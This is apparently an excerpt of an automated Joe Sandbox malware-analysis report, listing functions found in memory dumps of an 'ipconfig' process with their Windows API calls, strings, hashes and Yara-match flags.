Opcode ID: 15429527ceba067abb3460f33dc5ad7b7a54045662ad1c4ccb330954ab0d6acd
Instruction ID: 4459ccc8665fdb0600fb8653159d72facce46894b2802df968cebdc84e6901d0
Opcode Fuzzy Hash: 15429527ceba067abb3460f33dc5ad7b7a54045662ad1c4ccb330954ab0d6acd
Instruction Fuzzy Hash: 3990023120580882D20071594444B47000587E0301F55C016A01287B9D8615CD517521

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2C7A

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58ead9fa50089488a9a54317d011903aa8b61194620c2ffb5fc8cb9931d1fe67
Instruction ID: 2b228a171012e650e02b90346051c645da336e352edb864182fc80e16101c12d
Opcode Fuzzy Hash: 58ead9fa50089488a9a54317d011903aa8b61194620c2ffb5fc8cb9931d1fe67
Instruction Fuzzy Hash: 1490023120588842D2107159844474B000587D0301F59C411A44287BDD86958D917121

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2DDA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69d95d35bf871ec6dd6a70900c3b936fd8f0e179f4e4ef2d521b5af2d18e6bfb
Instruction ID: 14f6346ef80e735840c88cae9f49e83b748f76fc0e5719033300892aaf83a146
Opcode Fuzzy Hash: 69d95d35bf871ec6dd6a70900c3b936fd8f0e179f4e4ef2d521b5af2d18e6bfb
Instruction Fuzzy Hash: FB900221246841925645B1594444607400697E0241795C012A1418AB5C85269D56E621

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2DFA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0feb85175936b5f04f574468b74b01d572096906bb0a245f70a9112761d3393a
Instruction ID: 711e5a4f6f1f4d75b7442574c583fcb033122b5a2e441cad0cb9da01c14d05cc
Opcode Fuzzy Hash: 0feb85175936b5f04f574468b74b01d572096906bb0a245f70a9112761d3393a
Instruction Fuzzy Hash: 7190023120580453D21171594544707000987D0241F95C412A04286BDD96568E52B121

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2D1A

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c3a40ce6f883a008d485c0f86443221c970af332fc51d515ed5fa57c5171321
Instruction ID: 180bf86142ca6a496bd093fbb7c8f24c67fdb50524b31754b16668792ddc5e73
Opcode Fuzzy Hash: 4c3a40ce6f883a008d485c0f86443221c970af332fc51d515ed5fa57c5171321
Instruction Fuzzy Hash: 3D90022921780042D2807159544870B000587D1202F95D415A00196BDCC9158D696321

Uniqueness

Uniqueness Score: -1.00%

Function 02CF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF35CA

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 82772345d7a9706e2052337e50ad9908a2b8b2cb24aa18d5074355ac0e647ca8
Instruction ID: 72d3a5a73362eb0da07be5e9fb8e9942d3a290f62d757b5dc5cca0c659972942
Opcode Fuzzy Hash: 82772345d7a9706e2052337e50ad9908a2b8b2cb24aa18d5074355ac0e647ca8
Instruction Fuzzy Hash: E890023160990442D20071594554707100587D0201F65C411A04286BDD87958E5175A2

Uniqueness

Uniqueness Score: -1.00%

Function 001E9080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 001E9128

Strings

net.dll, xrefs: 001E90F1, 001E9177, 001E914F, 001E915B, 001E9183
wininet.dll, xrefs: 001E90DE, 001E90E7

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
Instruction ID: 5b744e57fe39479e4cbf82da1214216b89f1d663388add70a2a4289cf74a5eae
Opcode Fuzzy Hash: 2fc5539ce258b5b6beccd941e799445f8f165c982dea3b187c6cdf1ac72fd1ad
Instruction Fuzzy Hash: 8A316FB2500685ABC724DF65C885FABB7B8BB48B00F10811DFA2E5B245DB34A650CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001E9076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 001E9128

Strings

net.dll, xrefs: 001E90F1, 001E914F, 001E915B
wininet.dll, xrefs: 001E90DE, 001E90E7

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: de2fc7c84ecfdab046a1dd564705555f856c7ef8b28b5c9f147e388a05ba431a
Instruction ID: a2db5866c45ac6d52874309b2fa243ecfa03a822b340b88782898d3725f74d93
Opcode Fuzzy Hash: de2fc7c84ecfdab046a1dd564705555f856c7ef8b28b5c9f147e388a05ba431a
Instruction Fuzzy Hash: D021A2B1900785ABC714DF65C885BABBBB4BB48B00F10815DFA2D5B246D774A950CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001EA66A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA69D

Strings

.z`, xrefs: 001EA68C, 001EA698

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
Instruction ID: 79459d5dc5100889a876c4b5e80a8d3f86f3d9bfce4fef0fbcd8ec9e69994bec
Opcode Fuzzy Hash: dca94dd89a7ff1073f356e9cc4e0b44025c9e8db34db8b90f8117bea69c8e11b
Instruction Fuzzy Hash: CEE04FB5200604AFD714DF69CC84EEB37AAEFD8350F128555FA1C97252C631E910CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 001EA670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA69D

Strings

.z`, xrefs: 001EA68C, 001EA698

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 38ddd55d596ebbf43395349a09886790c6a70e3e1b42dc4d40bb9c2280a87932
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 8EE04FB1200208ABD714DF59CC45EAB77ACEF88750F118554FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 001D8308 Relevance: 3.1, APIs: 2, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D838B

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
Instruction ID: b1f08f6326d3d4b7f2fb2db1c6476fce2ddc87c7f537df347b19eea8fe0a4e58
Opcode Fuzzy Hash: 08e5002918a0815f30b35ee7c4d339c5fe196305e5db9d7d16ff0b47b1b6a60c
Instruction Fuzzy Hash: CA01D831A5062877E721A6949C43FFE772C6F50F51F040115FF08BA1C2EBD8690647E6

Uniqueness

Uniqueness Score: -1.00%

Function 001D8310 Relevance: 3.1, APIs: 2, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D836A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D838B

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction ID: 3fe5d4af304619169aca7bdaa9ccd228fd08d39c81944d171b3e694e0880bdfd
Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
Instruction Fuzzy Hash: DD018F31A9022877E720A6959C43FBE776C6F50F50F040119FF08BA2C2EBA8690646E6

Uniqueness

Uniqueness Score: -1.00%

Function 001E91FD Relevance: 1.6, APIs: 1, Instructions: 115
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
Instruction ID: 8ab1c497b1ab7c06829c9890bf43ac56b8776738b4cad0bb9c940265d09aa59f
Opcode Fuzzy Hash: d7e66a0fd0e46a7025957f9718b4efbef03700ad3ac2b28073421fc65b9bd556
Instruction Fuzzy Hash: 9C41D4B2600B466BD728DF75CC86FEBB3A8BF50750F044519F5299B181DB70B910CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001DACF0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 001DAD62

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction ID: 5c8fb783ba7d36d066783cc4babe1be8c78f8e92ccc23438f4e0a8ab58370123
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: 4F015EB5D0020DABDF10EAE1DC42F9EB3789F14308F004595A90897241F731EB04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001EA6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA734

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: fe5432fad661051d232fa2c961e5f91934538ce51321436420422d6f2e6024d2
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: A701AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001E91B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction ID: 318394a4e9e419ab45b265d05ba5baa1092a4a01ce8081cc22ccdd4c232d299f
Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
Instruction Fuzzy Hash: 10E06D373807043AE320659AAC02FABB29C9B91B20F15002AFA0DEA2C1DA95F80142A5

Uniqueness

Uniqueness Score: -1.00%

Function 001E91A3 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,001DF050,?,?,00000000), ref: 001E91EC

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
Instruction ID: 1ed612d51514f37f9a2b9199754d9862949640f500f2720981696855e476d92f
Opcode Fuzzy Hash: fc490646e4c839dc7f1cdacfc301d162244f29ad5bce9bd96e34a3e84aaec4dd
Instruction Fuzzy Hash: 55F0E5327807003ED3309A6A9C47FEB73A89FA0B10F24002DF609AB2C1CBA4F4424695

Uniqueness

Uniqueness Score: -1.00%

Function 001EA7C2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1D2,001DF1D2,?,00000000,?,?), ref: 001EA800

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
Instruction ID: db1dc2b59ee473552f25f6dd7d6364a08950a2b64fad76ab455898e52a892e9b
Opcode Fuzzy Hash: 95cb0380192baa6882f75abe5daef2f4b9407254435c44d4b055a1ac55a7d9ae
Instruction Fuzzy Hash: D3F0EDB5200259AFCB10DF58CC84FDBBBA8EF88640F118198FE0C5B242CA30A811CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 001EA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(001E4536,?,001E4CAF,001E4CAF,?,001E4536,?,?,?,?,?,00000000,00000000,?), ref: 001EA65D

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: dfe76e3bb10493300c61a850058e9c9af80f05d316b848c3cc3873e2c48c2de6
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: C7E046B1200208ABDB14EF99CC41EAB77ACEF88754F118558FE085B242C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 001EA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,001DF1D2,001DF1D2,?,00000000,?,?), ref: 001EA800

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: c911a41c6827853bf5f0d7a86b492a1b4bfcd10b63645bb9ba1890d2e8d5651e
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 6AE01AB1200208ABDB10DF59CC85EEB37ADEF88650F118154BA0857241CA30F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 001DF6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,001D8D14,?), ref: 001DF6FB

Memory Dump Source

Source File: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d0000_ipconfig.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 3c6063d180d580dde8fee5d7b7e8b3255b79cdab80299f152a435bf56a52f7ec
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: C8D0A7727503083BE710FAA59C03F2632CC6B54B00F490074F949D73C3EE54F5014165

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02CF2C24

Memory Dump Source

Source File: 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true

Associated: 00000007.00000002.3826243110.0000000002DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002DAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2c80000_ipconfig.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b594aa2c143c97382829aa5f35a182ff1fffb02841cc70664398e62704e26fde
Instruction ID: 169c5be14fd762fe38c337caf1621b6e8c87a91770faa68c17ca17204a33bb5c
Opcode Fuzzy Hash: b594aa2c143c97382829aa5f35a182ff1fffb02841cc70664398e62704e26fde
Instruction Fuzzy Hash: 3FB09272906DC5CAEB91E7604A08B1B7A00ABD0701F2AC062E30347A6E4738C6D1F2B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C739FE Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 616memorywindowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(000008FF,00000000,00000000,?,00000014,00000000), ref: 00C73BEE
ConvertLengthToIpv4Mask.IPHLPAPI(?,00000000), ref: 00C73C4F
InetNtopW.WS2_32(00000002,?,?,00000041), ref: 00C73C79

Part of subcall function 00C73096: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00C730B1
Part of subcall function 00C73096: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00C730BF
Part of subcall function 00C73096: GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00C730D9
Part of subcall function 00C73096: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00C730E5

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

Part of subcall function 00C74E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00C71EB0,00000000,00002908), ref: 00C74E96
Part of subcall function 00C74E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00C71EB0,00000000,00002908), ref: 00C74EAE

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00C73F4C
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C73F53
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00C73FCE
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00C73FD5

Part of subcall function 00C73901: RtlIpv4AddressToStringExW.NTDLL ref: 00C73918

LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00C74141
LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,?,?,?,?), ref: 00C74151
GetAdaptersAddresses.IPHLPAPI(00000000,000000C6,00000000,00000000,?), ref: 00C74167
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00C74190

Strings

A, xrefs: 00C74040
%02X-, xrefs: 00C73AD2, 00C73F85

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: Local$FreeHeapTime$FileFormat$AllocIpv4MessageProcess$AdaptersAddressAddressesConvertDateErrorInetLastLengthMaskNtopStringSystem__iob_func
String ID: %02X-$A
API String ID: 2780012581-292374352
Opcode ID: 5167cc1c5b65d1d681e3419c7f8328ab691b120d899c05684dad376c3b64dbb1
Instruction ID: 35d941c3184e4f6cd86d96e91bef715af63973ec91d21906a48d414cef6ab494
Opcode Fuzzy Hash: 5167cc1c5b65d1d681e3419c7f8328ab691b120d899c05684dad376c3b64dbb1
Instruction Fuzzy Hash: B122BD71A14215AFDB28AB64CC86FEAB37CFF04710F048199F91DAB181DB719F849B91

Uniqueness

Uniqueness Score: -1.00%

Function 00C751A0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00C752D6,00C71000), ref: 00C751A7
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00C752D6,?,00C752D6,00C71000), ref: 00C751B0
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00C752D6,00C71000), ref: 00C751BB
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00C752D6,00C71000), ref: 00C751C2

Memory Dump Source

Source File: 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000007.00000002.3825630510.0000000000C77000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_c70000_ipconfig.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 3065dcbb460aa3e609b7af6783cbfaa34299543b7cbd6de8178f283f74738b36
Instruction ID: 3c5ea43b66ce11124972d8cdf34555c94670b29962140b12d4c12c4bb4a78687
Opcode Fuzzy Hash: 3065dcbb460aa3e609b7af6783cbfaa34299543b7cbd6de8178f283f74738b36
Instruction Fuzzy Hash: 65D0C93200820CABDB002BF1EC0CB4D3F2CEB48212F048110F30E82060CA7144818B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C73872 Relevance: 4.6, APIs: 3, Instructions: 58networkCOMMON

Download Yara Rule

APIs

DnsGetCacheDataTableEx.DNSAPI(00000001,00000000,?), ref: 00C73885
DnsFree.DNSAPI(?,00000000), ref: 00C738E8
DnsFree.DNSAPI(?,00000000), ref: 00C738F0

Part of subcall function 00C75769: __iob_func.MSVCRT ref: 00C7576E

